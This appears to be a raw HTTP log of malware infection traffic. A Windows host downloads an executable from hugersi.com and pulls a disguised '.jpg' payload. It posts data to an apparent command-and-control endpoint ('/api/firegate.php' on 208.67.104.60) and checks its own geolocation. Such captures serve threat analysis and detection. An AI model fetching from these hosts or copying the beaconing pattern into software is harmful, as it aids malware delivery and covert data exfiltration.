GET /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 06 Jul 2023 01:51:51 GMT Content-Type: application/octet-stream Content-Length: 221696 Last-Modified: Thu, 06 Jul 2023 01:30:02 GMT Connection: keep-alive ETag: "64a6191a-36200" Accept-Ranges: bytes

GET /sts/imagc.jpg HTTP/1.1 User-Agent: HTTPREAD Host: us.imgjeoigaa.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 06 Jul 2023 01:52:33 GMT Content-Type: image/jpeg Content-Length: 1506508 Last-Modified: Wed, 28 Jun 2023 02:36:24 GMT Connection: keep-alive ETag: "649b9ca8-16fccc" Accept-Ranges: bytes

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 497 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:52:34 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 85.208.136.10

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:52:35 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /check/safe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Thu, 06 Jul 2023 01:52:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /check/?sid=350540&key=0a18d2181acd6532bf70a66142dc16a0 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43 Content-Length: 160 Host: aa.imgjeoogbb.com

HTTP/1.1 200 OK Server: nginx Date: Thu, 06 Jul 2023 01:52:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.30

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:52:36 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 301 Moved Permanently Date: Thu, 06 Jul 2023 01:52:38 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Thu, 06 Jul 2023 02:52:38 GMT Location: https://www.maxmind.com/geoip/v2.1/city/me Server: cloudflare CF-RAY: 7e2435a0aa08a7e1-ICN